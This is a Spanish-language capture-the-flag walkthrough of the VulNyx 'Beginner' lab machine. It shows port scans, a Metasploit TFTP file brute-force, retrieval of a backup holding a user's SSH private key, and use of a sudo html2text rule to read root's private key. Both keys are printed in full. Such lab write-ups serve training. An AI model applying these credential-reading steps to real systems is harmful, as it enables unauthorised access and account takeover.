VulNyx - Beginner
Information
Beginner es una máquina virtual vulnerable Linux de dificultad baja de la plataforma VulNyx, fue creada por el usuario d4t4s3c y funciona correctamente en los hipervisores VirtualBox y VMware.
Enumeration
Nmap
TCP
❯ nmap -n -Pn -sS -p- --min-rate 5000 192.168.1.48
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-27 21:13 CEST
Nmap scan report for 192.168.1.48
Host is up (0.00034s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
❯ nmap -sVC -p22,80 192.168.1.48
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-27 21:13 CEST
Nmap scan report for 192.168.1.48
Host is up (0.00049s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
| 256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_ 256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp open http Apache httpd 2.4.56 ((Debian))
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: Site doesn't have a title (text/html).
UDP
❯ nmap -sU --top-ports 20 192.168.1.48 --open
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-27 21:16 CEST
Nmap scan report for 192.168.1.48
Host is up (0.00070s latency).
Not shown: 18 closed udp ports (port-unreach)
PORT STATE SERVICE
68/udp open|filtered dhcpc
69/udp open|filtered tftp
Shell (boris)
80/TCP (HTTP)
Site
En el sitio web existe una pista que indica la existencia de archivos expuestos
Directory Brute Force
❯ gobuster dir -w /opt/directory-list-2.3-medium.txt -u http://192.168.1.48/
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.48/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/server-status (Status: 403) [Size: 277]
Progress: 220545 / 220546 (100.00%)
===============================================================
Finished
===============================================================
69/UDP (TFTP)
Files Brute Force
Uso un modulo de Metasploit para descrubir si existen archivos expuestos en TFTP
❯ msfconsole -q
msf6 > use auxiliary/scanner/tftp/tftpbrute
msf6 auxiliary(scanner/tftp/tftpbrute) > set RHOSTS 192.168.1.48
RHOSTS => 192.168.1.48
msf6 auxiliary(scanner/tftp/tftpbrute) > run
[+] Found backup-config on 192.168.1.48
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Descargo backup-config y al revisar con file veo que es un archivo zip
❯ atftp --get --local-file backup-config --remote-file backup-config 192.168.1.48
❯ file backup-config
backup-config: Zip archive data, made by v3.0 UNIX, extract using at least v1.0, last modified Jul 24 2023 11:40:32, uncompressed size 0, method=store
Descomprimo el zip y encuentro una id_rsa y el archivo de configuración sshd_config
❯ unzip backup-config
Archive: backup-config
creating: backup/
inflating: backup/id_rsa
inflating: backup/sshd_config
❯ tree
.
├── backup
│ ├── id_rsa
│ └── sshd_config
└── backup-config
2 directories, 3 files
Enumero al usuario boris y se puede deducir que la id_rsa es suya
❯ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAjFtqYQMwjoC87PgJOeAW9CleZvBZBBLXcGc3OmvNZIaTLdGz
rrJGUNypiMO0pbQY0i2HEG0O8Ske5b66dUl+HzH0bzSjKk5t+j/7HHOPx5t8mDK9
fL3vzJgocjMSFc/34+GVJc/O8X9D2klXiMhmXetv8KEbQl2PTSd1IMvPtOMvXJhe
1vwflPn+pOadIWPboml07D8RaB5xNEn0RpMA8xNpN6e5nswNdA2hqXpvmmEkQ/0C
4VwNEsUgrDkesVNf4grcfNelE7mluJB9C2866YB/zTfPrmMgTagxRBDJ8x00Um+s
EERAIoddKofczi6qDplqQoMxzWAP2exFUL/0aQIDAQABAoIBAA6ebuQP2vzct9DO
vNdEWd+wd16tZfggpkPU3FG/bLMtuSKqltZ5Rw2hDh9qkuQ3b+ZkS48QbN/9cnRn
ezBAKVzCbT0v9FaxuI66H0OFXdJihYWss0PM3K8oof3TB+0xrhYUJt67WEibAsw3
m2Bpzw+1OAGOJjKxX/2fQHncAJRMdIVBR3ZTev2+SbJPoNrUDukyG/EeqlKLMvmY
nzwhMRIBIEhD6pqnp4eSPyd1syo/h3jNZVxcYTty4LgD2BFza+qvRwD+JRQ60ZE7
QdE6UPNkPopAv4PGb1aXosA3XmxE73qfcpoYOEQmDa242+h5/BTiqY5vKknUOxZ/
HdHzqaECgYEA9nmlZORiOsnwm62sDsLJHoWSh4wfoxy+6Pe1Df9/x7FRKuTW2tRs
D6awUnTNMAE1Z+BwgpuC5usK2n94657crzsvep+9fpS5vnmNGZOkzqgIAvuQCKtA
rO4Na3YhLLtUuK9YXSHGW7NgAU9xLQLKEj2iR1QEr08d4/KJHfH9HI0CgYEAkcf0
OX5hI4dB0CdopFRehIKWFAh9z5vMiS6SBKCeKs+D5tASGBMfVAPA0SEkj8h5dDgp
fDtILNZXLuOY97FZKS9AIPjjBG3AdGh2HESOQqM8Ql6e72vr9B9cncGOJ9hSp+hw
JWUMKu1hC8GkFuEmKn96wfsksukf29gAzqvjVk0CgYBihPVLgs6Q2S9Hyv+/VrS1
cobDj4sF0/Org3fnhH07APGEx7vp9IbNKr/H9dAepB0IzHmseySz0Leh5toatIFZ
ubqctUU1V5V3QXbZBl8WC6xIJO3JyUos1WqfzbQtASQ4Pj5/24RCG00AuRRv/XFw
IRrAkCDfQiycdNHCGnwl8QKBgFSN4X2na7grr2SINw15UgkRpPKhqjdMamn29QJy
FstF6X9ql9QW40jblG64BnjPEoLyQD2qNMas24x6vjKMTuawXUXClgnvjnz2SetD
aDAGdeEY+J5tvkGuHw3xQf6iXe69xq4p2dDcNjmXaxFKLdTgc9cnT7XluXDN7Enz
MLzRAoGBANok+/jBi6flEgqlMbhEwC3XMlAWK/UxbnR2fAaCsL6H0qvUknv3wcZ2
ChCLhbMHOAet5onYSshYTfOybIfdJrPQo3AGcGw9yYxEJyskK/EB8sOtIYEAroZK
BJwhryQSjdQXGTnTmdCzg+jJDo1QvnmnBXWSzGOKYOWIhyRpGm/r
-----END RSA PRIVATE KEY-----
❯ tail -n3 sshd_config
Match User boris
PasswordAuthentication no
22/TCP (SSH)
Accedo al sistema como usuario boris
❯ chmod 600 id_rsa
❯ ssh -i id_rsa boris@192.168.1.48
boris@beginner:~$ whoami ; id
boris
uid=1000(boris) gid=1000(boris) grupos=1000(boris)
Privilege Escalation
Enumeration
Sudo
El usuario boris puede ejecutar el binario html2text con sudo
boris@beginner:~$ sudo -l
Matching Defaults entries for boris on beginner:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User boris may run the following commands on beginner:
(root) NOPASSWD: /usr/bin/html2text
Abuse
Con html2text consigo leer la clave privada id_rsa del usuario root
boris@beginner:~$ sudo -u root html2text /root/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY----- MIIEogIBAAKCAQEAhNACeq9+AH6O1/b3OaUEEIa8/
EmrcLunt8ZJeMKV4fr6bzde
5Sn5HiykGnIduo4DWHsp1n1GQq7Xy+ZyCxZPFWcswb8LAT880KJp7TC69SqqRpSm
Ci7kMh8aahQ6GuhwFMX5eXyj+ThmGUhGNRwknrP058JhsO4w9lzIk/HStfUQZTem
qNKOPLvvgkNuB3LhOrwEbx3NIgeQmJbgEnL4Sl9FDLexThBSWOSln3fatJg39J3R
d12NPluhdk1cso5Y148YebAaqG82Th/OhHm6NhN3MVi/BXyY/MZ2nLbuFaBNVbAj
tFL+Zd5MV54YCH+fYxWUGkdiMG+LsJnydR8uxQIDAQABAoIBAHko9goMTOuQiSmV
4IXS93lIIeIaJu+KEgBCQUaMZYWpm4uYPNbcyqnvWanSjzJgWcb/XPSShmVQ8gbO
bR2WNYE2BYueiCCUGxvN/spmWThNutb2xt6lVoIvA77gQv3HLHCXBvcAcOprvCC2
YW4UBYhObU58cvig40Ps8wKcaniZCcVFKjjwvAGYVdAGm5BproRIvt2M4v9RBVsG
XfWOGI3EOyfJZwvx0dzoUUhe8YzAi3wDjda5/saKv0pKbJHGTkVLCYxlQ409FGq1
jSUAzJ+Wgo1h0IL6B5T5ZtLw2ElxMEf0aekCGOuQHX4J/Dfb3ZwBvawJdq5lAqoE
nZkKw2UCgYEA27q3iyPPAUtKbthTjPZzkngH/E0fbr6q1sbmhNmn00CYB7/snB5H
drSqyaOI+zZX7HZGxDOq/jvuCU/bKJ3xwfYw1TAwYBB7vwrwazQAhsMKReOWTves
Zebv+hQNq4hfL1hcF+azc7fOe3O8jaMS8W92sMpSWcUaGbzxcq1lq/cCgYEAmrxg
o1B0QhLCVXz62vgLubIw9Xm1cAY24lV8Z43QZeeghNQX9/ubOQAO9nbqedNolPwv
GBRI+5Y26mVobJvfQxt54sa3+uEd7AwHz6+gFhHfB0gu1oHQuDRKYV5CXriQPAE9 LEZsV/
82KgVWZVzstsF2G9r3p5Ou4VcU+11ptCMCgYAeGCSrWewwMS+wntBSri6G
EQqG88kqUdL0N6m66FSkCmTIKvEtMLh4+aWqmEtanMbODCUFGk6BI5Qmkllh5sAF
4MIvcLovbhKEx+rFxAmOa4gsqk8b4bArBMY5aiW1KKhgw6lZXK+XWcVeAyv/+iXO C4YmEI/
W27gHbmljW3xhYQKBgFMyN+93YZrpBS37zdEQDxXf9iz2LJS38qiM+B+h
g0xXVto0Q1LlKFdkbacc1wN7pL5+PUAAICGNaadrsNK8mDU3v7gryl4Mzg7NhSGo
tzVGlJkQuYZCNBvmmZtyl9Lf/0UUEXUNxFEn+lJrnkFPzkKREFT3zbJ/WEb2kGR6
nEvrAoGAGwRoisMbU9E4lIibq/JD/i22u5VenuvEqJs8H/cv49DsVdYYBV4rOi/
u RWRA98sN8yc06jFezYYNw4RMk2Nfgeqd3pnNVVHRq9uBOsiOknVVFOOHsMi6IExx
AgMuIviN7GZ1VDlPDbaYw1+8keJq4eeYRkjLpxcMDBJJwNQ8h6c= -----END RSA PRIVATE KEY--
---
Corrijo el formato de la id_rsa ya que contiene saltos de línea y espacios
❯ cat id_rsa ;echo
-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEAhNACeq9+AH6O1/b3OaUEEIa8/EmrcLunt8ZJeMKV4fr6bzde
5Sn5HiykGnIduo4DWHsp1n1GQq7Xy+ZyCxZPFWcswb8LAT880KJp7TC69SqqRpSm
Ci7kMh8aahQ6GuhwFMX5eXyj+ThmGUhGNRwknrP058JhsO4w9lzIk/HStfUQZTem
qNKOPLvvgkNuB3LhOrwEbx3NIgeQmJbgEnL4Sl9FDLexThBSWOSln3fatJg39J3R
d12NPluhdk1cso5Y148YebAaqG82Th/OhHm6NhN3MVi/BXyY/MZ2nLbuFaBNVbAj
tFL+Zd5MV54YCH+fYxWUGkdiMG+LsJnydR8uxQIDAQABAoIBAHko9goMTOuQiSmV
4IXS93lIIeIaJu+KEgBCQUaMZYWpm4uYPNbcyqnvWanSjzJgWcb/XPSShmVQ8gbO
bR2WNYE2BYueiCCUGxvN/spmWThNutb2xt6lVoIvA77gQv3HLHCXBvcAcOprvCC2
YW4UBYhObU58cvig40Ps8wKcaniZCcVFKjjwvAGYVdAGm5BproRIvt2M4v9RBVsG
XfWOGI3EOyfJZwvx0dzoUUhe8YzAi3wDjda5/saKv0pKbJHGTkVLCYxlQ409FGq1
jSUAzJ+Wgo1h0IL6B5T5ZtLw2ElxMEf0aekCGOuQHX4J/Dfb3ZwBvawJdq5lAqoE
nZkKw2UCgYEA27q3iyPPAUtKbthTjPZzkngH/E0fbr6q1sbmhNmn00CYB7/snB5H
drSqyaOI+zZX7HZGxDOq/jvuCU/bKJ3xwfYw1TAwYBB7vwrwazQAhsMKReOWTves
Zebv+hQNq4hfL1hcF+azc7fOe3O8jaMS8W92sMpSWcUaGbzxcq1lq/cCgYEAmrxg
o1B0QhLCVXz62vgLubIw9Xm1cAY24lV8Z43QZeeghNQX9/ubOQAO9nbqedNolPwv
GBRI+5Y26mVobJvfQxt54sa3+uEd7AwHz6+gFhHfB0gu1oHQuDRKYV5CXriQPAE9
LEZsV/82KgVWZVzstsF2G9r3p5Ou4VcU+11ptCMCgYAeGCSrWewwMS+wntBSri6G
EQqG88kqUdL0N6m66FSkCmTIKvEtMLh4+aWqmEtanMbODCUFGk6BI5Qmkllh5sAF
4MIvcLovbhKEx+rFxAmOa4gsqk8b4bArBMY5aiW1KKhgw6lZXK+XWcVeAyv/+iXO
C4YmEI/W27gHbmljW3xhYQKBgFMyN+93YZrpBS37zdEQDxXf9iz2LJS38qiM+B+h
g0xXVto0Q1LlKFdkbacc1wN7pL5+PUAAICGNaadrsNK8mDU3v7gryl4Mzg7NhSGo
tzVGlJkQuYZCNBvmmZtyl9Lf/0UUEXUNxFEn+lJrnkFPzkKREFT3zbJ/WEb2kGR6
nEvrAoGAGwRoisMbU9E4lIibq/JD/i22u5VenuvEqJs8H/cv49DsVdYYBV4rOi/u
RWRA98sN8yc06jFezYYNw4RMk2Nfgeqd3pnNVVHRq9uBOsiOknVVFOOHsMi6IExx
AgMuIviN7GZ1VDlPDbaYw1+8keJq4eeYRkjLpxcMDBJJwNQ8h6c=
-----END RSA PRIVATE KEY-----
Accedo al sistema como usuario root
❯ chmod 600 id_rsa
❯ ssh -i id_rsa root@192.168.1.48
root@beginner:~# id ; hostname
uid=0(root) gid=0(root) grupos=0(root)
beginner
Flags
Ya como usuario root puedo leer las flags user.txt y root.txt
root@beginner:~# find / -name user.txt -o -name r00* 2>/dev/null |xargs cat
16bd****************************
1c53****************************
Hasta aquí la resolución de la máquina Beginner.
Happy Hacking!